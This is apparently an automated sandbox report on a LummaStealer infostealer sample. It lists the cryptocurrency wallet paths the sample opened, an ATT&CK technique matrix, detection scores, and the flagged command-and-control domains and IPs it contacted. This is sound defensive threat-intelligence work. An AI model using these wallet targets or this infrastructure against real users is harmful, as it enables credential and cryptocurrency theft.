          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Binance
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, Directory queried: C:\Users\user\Documents
          Source: Yara match, File source: 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: nvtoaldlrg.exe PID: 7128, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match, File source: Process Memory Space: nvtoaldlrg.exe PID: 7128, type: MEMORYSTR
          Source: Yara match, File source: 0.2.nvtoaldlrg.exe.ac0000.0.unpack, type: UNPACKEDPE
          | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
          | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 321 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
          | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
          | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 11 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 31 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |

          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | nvtoaldlrg.exe | 58% | Virustotal | | Browse |
          | nvtoaldlrg.exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer | |
          | nvtoaldlrg.exe | 100% | Avira | HEUR/AGEN.1314134 | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | https://www.gstatic.cn/recaptcha/ | 0% | Avira URL Cloud | safe | |
          | https://guntac.bet:443/bSHsyZDal | 0% | Avira URL Cloud | safe | |
          | https://guntac.bet/ | 0% | Avira URL Cloud | safe | |
          | https://latchclan.shop:443/Wjquw | 100% | Avira URL Cloud | malware | |
          | https://bugildbett.top:443/bAuzaMicrosoft | 100% | Avira URL Cloud | malware | |
          | https://citydisco.bet/gd | 0% | Avira URL Cloud | safe | |
          | https://featureccus.shop:443/bdMAn | 100% | Avira URL Cloud | malware | |
          | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|---|---|
          | steamcommunity.com | 104.73.234.102 | true | false | | high |
          | jowinjoinery.icu | 188.114.97.3 | true | false | | high |
          | citydisco.bet | 188.114.97.3 | true | false | | high |
          | legenassedk.top | 188.114.96.3 | true | false | | high |
          | htardwarehu.icu | 104.21.48.1 | true | false | | high |
          | bugildbett.top | 104.21.16.1 | true | false | | high |
          | mrodularmall.top | 104.21.96.1 | true | false | | high |
          | cjlaspcorne.icu | 104.21.80.1 | true | false | | high |
          | guntac.bet | 188.114.96.3 | true | false | | unknown |
          | latchclan.shop | unknown | unknown | false | | high |
          | featureccus.shop | unknown | unknown | false | | high |
          | Name | Malicious | Antivirus Detection | Reputation |
          |---|---|---|---|
          | bugildbett.top/bAuz | false | | high |
          | citydisco.bet/gdJIS | false | | high |
          | mrodularmall.top/aNzS | false | | high |
          | https://steamcommunity.com/profiles/76561199822375128 | false | | high |
          | jowinjoinery.icu/bdWUa | false | | high |
          | htardwarehu.icu/Sbdsa | false | | high |
          | https://citydisco.bet/gdJIS | false | | high |
          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                          unknown
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbacknvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994617580.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&l=envtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&amnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&amnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://s.ytimg.com;nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://steamcommunity.com/=M:PAnvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=englinvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steam.tv/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=ennvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://steamcommunity.com/profiles/7656119982nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://store.steampowered.com/privacy_agreement/nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/points/shop/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&anvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://sketchfab.comnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com:443/profiles/76561199822375128nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://guntac.bet/nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://lv.queniujq.cnnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brnvtoaldlrg.exe, 00000000.00000003.890771013.00000000049DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.youtube.com/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/privacy_agreement/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://bugildbett.top:443/bAuzaMicrosoftnvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        unknown
                                                                                                                                        https://steamcommunity.com/-Mnvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/%Mnvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/recaptcha/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://checkout.steampowered.com/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.enigmaprotector.com/nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://gemini.google.com/app?q=nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.48.1 | htardwarehu.icu | United States | 13335 | CLOUDFLARENETUS | false
104.21.16.1 | bugildbett.top | United States | 13335 | CLOUDFLARENETUS | false
188.114.97.3 | jowinjoinery.icu | European Union | 13335 | CLOUDFLARENETUS | false
104.21.96.1 | mrodularmall.top | United States | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | legenassedk.top | European Union | 13335 | CLOUDFLARENETUS | false
104.73.234.102 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
104.21.80.1 | cjlaspcorne.icu | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1637345
Start date and time: 2025-03-13 14:57:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nvtoaldlrg.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/7
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 23.199.214.10, 23.60.203.209
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:58:08 | API Interceptor | 9x Sleep call for process: nvtoaldlrg.exe modified
                                                                                                                                                                                                                          steamcommunity.comscript5.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                                                          https://stearncommmunity.com/profiles/52829086342741Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                                                          https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          https://sceanmcommnunmnlty.com/sotep/aofpe/zoeprGet hashmaliciousUnknownBrowse
